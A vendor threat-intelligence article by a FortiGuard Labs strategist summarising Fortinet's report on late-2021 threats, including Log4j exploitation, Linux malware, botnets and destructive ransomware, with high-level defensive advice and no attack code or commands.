New report sheds light on most destructive cybersecurity threats and best defenses

Derek Manky, FortiGuard Labs

The latest Fortinet Global Threat Landscape report points to a troubling trend on the cybersecurity front – cybercriminals are developing attacks faster than ever. Examining the last half of 2021, the team at FortiGuard Labs found evidence that cyber criminals’ tactics are rapidly evolving as they adopt more destructive and unpredictable advanced and persistent cyber crime strategies.

The report draws data from billions of threat events offering security professionals insight into the threat landscape at a regional and global level.

From exploiting new technologies to taking advantage of “remote everything”, attackers are quickly evolving their tactics for faster, more sophisticated, and more destructive attacks. This advanced persistent cyber crime strategy is unpredictable and it’s critical that organizations understand the threat landscape in order to protect their rapidly extended networks.

Attack speeds are increasing
Early in December 2021, a vulnerability was discovered in the Apache Log4j framework. Log4j is deployed in servers globally and used by millions of applications. Log4j demonstrated how rapidly cyber criminals could exploit any vulnerability. The activity escalated so quickly it became the year’s most prevalent intrusion prevention system (IPS) detection and logged 50 times the activity of ProxyLogon, another well-known 2021 outbreak. Log4j earned the maximum CVSS score because it was easy to exploit and could deliver a full remote code execution on a target system.

What does this mean for organizations? This attack’s speed and potential damage should have defenders considering how long it takes to react to threats and patch vulnerabilities.

New vectors, new targets
Recently, new malware has emerged that targets Linux systems, often in executable and linkable format (ELF) binaries. Once overlooked by threat actors, Linux is becoming a more attractive target, given that it is the backbone of many network back-end systems, container-based IoT device solutions, and mission-critical applications. According to The Global Threat report, the rate of new Linux malware signatures quadrupled over 2021, and malware detections of ELF files doubled. With Microsoft working to integrate Windows Subsystems for Linux into Windows 11, it is clear that organizations will need to secure, monitor, and manage Linux and other low-level threat systems with the same diligence used for any endpoint solution.

Botnets grow in sophistication
The report also warns that botnets are adopting newer and more sophisticated attack techniques. Today’s botnets move away from straightforward DDoS attacks to pack more punch, with threat actors now building attack kits that include ransomware. Recent botnet activity showed an association with a new variant of the RedXOR malware, which targets Linux systems for data exfiltration. In addition, detections of botnets delivering a variant of RedLine Stealer malware surged in early October using a COVID-themed file to find new targets.

Organizations can help protect against botnets by implementing zero-trust access solutions. By shifting to a least-access privileges approach, defenders can better secure IoT endpoints and devices and utilize automated detection and response capabilities to detect and isolate unusual activities.

More destructive ransomware
Threat actors keep increasing the destructive impact of widespread ransomware attacks by combining them with DDoS attacks or wiper malware. As ransomware-as-a-service (RaaS) business models proliferate, attacks are becoming a reality for all types of organizations. Over the course of the year, FortiGuard Labs observed a consistent level of malicious activity featuring ransomware strains such as Phobos, Yanluwongo, and BlackMatter. More recently, new wiper malware have appeared and there is also RagnarLocker which uses triple extortion, the third layer being a DDoS threat for ransom demand.

Organizations will need an end-to-end security approach to prevent ransomware attacks across all entry points, augmented by investments in advanced detection and mitigation as well as access to current threat intelligence.

Responding with intelligence
Having access to trusted insights on changing attack techniques is another way organizations can better prepare for cyberattacks. For this report, FortiGuard Labs detonated detected malware to understand better how they might impact organizations. They learned that organizations have a better chance to intervene and minimize the impact if caught early.

Threat intelligence services can help organizations stay on top of the latest threat trends to enable efficient security operations. With insights into the global threat landscape, organizations can maximize resources and proactively defend against trending threats to prevent or identify early on.

Staying a step ahead
The latest Global Threat report confirms that the new normal is more frequent, unpredictable, and destructive cyberattacks. Ad hoc collections of point products are no longer a viable defense. Instead, organizations must move toward integrated, intelligent solutions that ingest real-time threat intelligence and detect threat patterns to initiate a coordinated response. A cybersecurity mesh platform provides greater visibility and centralized management so that policies are enforced consistently, updates delivered promptly, and threat responses are coordinated faster across the extended network. These integrated solutions are an organization’s best chance to stay ahead of the rapidly changing threat landscape.

Derek Manky is Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs.